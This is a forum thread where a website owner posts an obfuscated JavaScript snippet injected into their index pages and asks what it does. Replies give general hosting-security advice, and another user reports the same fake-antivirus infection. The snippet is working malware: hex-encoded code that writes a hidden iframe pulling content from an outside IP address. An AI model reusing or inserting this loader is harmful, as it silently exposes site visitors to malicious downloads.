how do I translate this java script code

Hi,

I'm trying to figure out how my websites got hacked

they all had a line inseted in the index.html or index.php files.

I don't understand the code because its encoded somehow.

Code:

<SCRIPT>
<!--
var d=document,kol=561;
function O10H4859A80C7A7B3(H4859A80C7AFA8){  return( parseInt(H4859A80C7AFA8,16));}function H4859A80C7C7A5(H4859A80C7CF9D){ function H4859A80C7E38B() {return 2;} var H4859A80C7D79B='';for(H4859A80C7DF90=0; H4859A80C7DF90<H4859A80C7CF9D.length; H4859A80C7DF90+=H4859A80C7E38B()){ H4859A80C7D79B += ( String.fromCharCode (O10H4859A80C7A7B3(H4859A80C7CF9D.substr(H4859A80C7DF90, H4859A80C7E38B()))));}return H4859A80C7D79B;} document.write(H4859A80C7C7A5('3C7363726970743E696628216D796961297B642E777269746528273C494652414D45206E616D653D4F31207372633D5C27687474703A2F2F37372E3232312E3133332E3137312F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3833343231292B276633373832365C272077696474683D323939206865696768743D323739207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F494652414D45203E27293B7D766172206D7969613D747275653B3C2F7363726970743E'));
//-->
</SCRIPT>

I thought if I could understand it more I might be able to figure out what and how my sites got hacked

sorry to be such a dork

 

Are you saying that someone inserted that code into your website?


If so, then you should look into the security of the server, not necessarily the coding of your pages(unless you make use of scripting/programming within your pages).

I don't know enough about javascript myself to be able to tell you what all that means/does, but like I said, make sure the server and pages if necessary are secure. Where are your pages hosted? If you host them with a hosting company you may want to ask them about it and see if they know anything.

 

yeah that code was inserted into every index.htm and index.php just after the body tag. even index.html in the webalizer folder

I've changed my passwords - and contacted support at the hosting company they said - wasn't done via FTP and its okay now.

but I wanted to understand more about it so I can try and prevent it happening again.

the code makes a popup appear and tries to get the visitor to download some anti virius software. I dred to think what would happen if someone did actually DL the stuff.

 

Hmm that is bad. Honestly I don't think there would be any way to tell how it happened without knowing more details. And unless the server actually had logs recording when, how and by whom it was done, we'd only be guessing.

I think there would be two main ways it could have happened. Either there was a vulnerability within your site's programming, or there was a vulnerability within the server in some other way. Sounds to me like it was with the server in general and not something specific to your sites or the programs that they may have used. If that's pretty much exactly what the support said then it sounds to me like they knew what happened and have fixed the problem, which is what would lead me to believe that it wasn't anything specific with your site. I'm just speculating though, I'm certainly not a web server security expert.

At any rate, to really come to any conclusions there would have to be more details. Like the websites, the programs used by them, server information(which you obviously wouldn't be able to give much of), etc. etc. Really the people in the best position to figure out what happened would be the hosting company since they have access to the server and any logs that were taken, that sort of thing.

Seems to me like the hosting company would be more anxious to inform you of the situation... I mean, I certainly wouldn't want my sites hosted by someone who wasn't all over server security and the like. And if there ever was a problem, especially one like this, I'd want details.

 

same problem

Hi,

I have had the same problem. I reformatted and reinstalled - deleted my website files, uploaded - and then it all began again.

My index.htm and php pages have code added to them which runs AdvancedXPDestryer, and tries to download a file (fortunatley my AV software intercerpts it)

I think my domain has been hacked somehow. It might have something to do with my amember software or something.

The problen can also write to my windows hosts file.